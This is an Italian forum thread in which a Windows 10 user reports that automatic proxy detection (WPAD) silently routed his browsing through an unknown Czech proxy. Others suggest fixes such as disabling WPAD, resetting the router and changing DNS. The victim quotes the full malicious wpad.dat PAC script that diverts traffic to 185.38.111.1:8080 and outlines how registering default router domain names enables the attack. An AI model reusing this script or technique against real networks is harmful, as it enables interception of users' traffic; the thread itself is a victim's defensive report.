Attacco WPAD reindirizzamento proxy - che fare?

[Collision]

Ciao a tutti,
Non so se é il posto giusto, ma essendo un problema che colpisce soprattutto Windows credo possa interessare diversi..

Connessione: ADSL di Telecom, router wi-fi al quale mi collego (in wi-fi, no ethernet) con PC Windows 10, ando "Rileva automaticamente impostazioni" nei settaggi proxy.

Oggi ho provato a riattivarlo per curiosità e ho visto che il problema si ripresentava: PC inchiodato su internet e gli altri nessun problema.

Giusto per fare qualche prova vado su un sito di speed test è noto che mi riconosce con un ip stranissimo, iniziava con 185.38.xxx ECC ECC...

Dico ma che cavolo é? Io con Telecom ho sempre avuto 85.. o giù di lì.

Vado a disattivare ancora il rilevamento automatico del proxy, torno sul sito speed test e il mio ip torna normale (Telecom).
Vado a investigare e noto che praticamente quando attivo quella impostazione sono sotto un proxy della Repubblica Ceca!!!!! Eppure non ho mai settato nessun proxy in vita mia!!!

Inorridito spengo il pc e inizio a cercare informazioni su internet (con iPad ), ma non essendo esperto di questa cosa non capisco bene, l'unica cosa che ho capito é che lasciando attivato il rilevamento automatico proxy, quando si lancia un browser (Edge nel mio caso, ma anche altri) il browser stesso ricerca nella rete a cui appartiene, e riceve, un file wpad.dat che se ha talune istruzioni lo fanno in automatico passare su un proxy (spiegato a maccheroni). Questo significa naturalmente avere i propri dati di navigazione in mano a qualcuno.

Se si punta ad esempio il browser su http://wpad.domain.name/wpad.dat si ha questo script:

function FindProxyForURL(url, host) {
if (isPlainHostName(host) ||
dnsDomainIs(host, ".windowsupdate.com") ||
dnsDomainIs(host, ".microsoft.com") ||
dnsDomainIs(host, ".baidu.com") ||
dnsDomainIs(host, ".kaspersky.com") ||
dnsDomainIs(host, ".axaltacs.net") ||
dnsDomainIs(host, ".live.com") ||
dnsDomainIs(host, ".drivergenius.com") ||
isInNet(host, "10.0.0.0", "255.0.0.0") ||
isInNet(host, "172.16.0.0", "255.255.224.0") ||
isInNet(host, "192.168.0.0", "255.255.0.0") ||
isInNet(host, "127.0.0.0", "255.0.0.0"))
return "DIRECT";
else
return 'PROXY 185.38.111.1:8080';
}

pare sia un attacco Wpad. e non so perché ci sono finito di mezzo io, o Telecom, o il mio router.

Si accettano suggerimenti o considerazioni. Io brancolo nel buio proprio, a parte tenere disattivata la rilevazione automatica proxy (che in Windows é settata su attiva di default) non so che fare, se preoccuparmi ecc..

[tallines]

Prova a resettare il modem .

O gli cambi tu manualmente i DNS >

Come Cambiare DNS e scegliere i migliori del 2021


Altrimenti >

Disabilita WPAD in Windows per rimanere al sicuro su reti Wi-Fi pubbliche


Come e perché disabilitare il WPAD di Windows 10


Disabilitare WPAD su Windows per chiudere una vulnerabilità

[Collision]

Grazie per la risposta
Ho sia disattivato il wpad, del resto di usare un proxy con il pc di casa non ne ho proprio bisogno, che resettato il router. Ora non ho più problemi..

Leggendo in giro pare che in tanti abbiano notato questo problema negli ultimi tempi.. e pare riguardi i router Netgear in particolare.

Però se ho capito bene il problema sta nei dns, dovrei quindi prendermela con TIM che lascia scaricare una configurazione proxy del genere..

[fraussantin]

Quote:

Originariamente inviato da Collision

Grazie per la risposta
Ho sia disattivato il wpad, del resto di usare un proxy con il pc di casa non ne ho proprio bisogno, che resettato il router. Ora non ho più problemi..

Leggendo in giro pare che in tanti abbiano notato questo problema negli ultimi tempi.. e pare riguardi i router Netgear in particolare.

Però se ho capito bene il problema sta nei dns, dovrei quindi prendermela con TIM che lascia scaricare una configurazione proxy del genere..

Curiosità come ci si accorge se abbiamo subito quel tipo di attacco?

[Styb]

Quote:

Originariamente inviato da fraussantin

Curiosità come ci si accorge se abbiamo subito quel tipo di attacco?

Rileggendo la discussione, l'utente Collision non navigava più disattivando il WPAD, e ciò vuol dire che sei sotto un proxy non voluto, e controllando la geolocalizzazione del suo indirizzo IP si è accorto che era situato nella Repubblica Ceca.

[Collision]

Infatti, il Wpad é attivo di default su Windows, mentre su iOS no, per quello con quelli non avevo problemi.

Basta che vai in qualsiasi sito che ti esibisce l'ip, e vedi se gli risulta il tuo legittimo (Tim, Vodafone o qualunque ISP ti fornisce la connessione) oppure un ip sconosciuto.

Comunque pare che sia una vulnerabilità dimostrata già da tempo, credo centri con il fatto che nelle impostazioni di default di certi router siano specificati nomi di siti fasulli tipo (domain.name... my.domain) che sono tutti tilde che ad oggi si possono pure registrare, quindi basta che uno registri il sito domain.name, dentro ci metta un file che viene scaricato in automatico da tutti i router che hanno impostato quel sito finto, ed il gioco é fatto...

Ripeto, non ne so molto, mi sto piano piano informando solo ora, magari passasse di qua qualcuno che se ne intende.

[Nicodemo Timoteo Taddeo]

Quote:

Originariamente inviato da Collision

Infatti, il Wpad é attivo di default su Windows, mentre su iOS no, per quello con quelli non avevo problemi.

È stupefacente come Microsoft martelli gli zebedei della gente con gli aggiornamenti automatici obbligatori necessari per la sicurezza e lasci attivate di default cose del genere...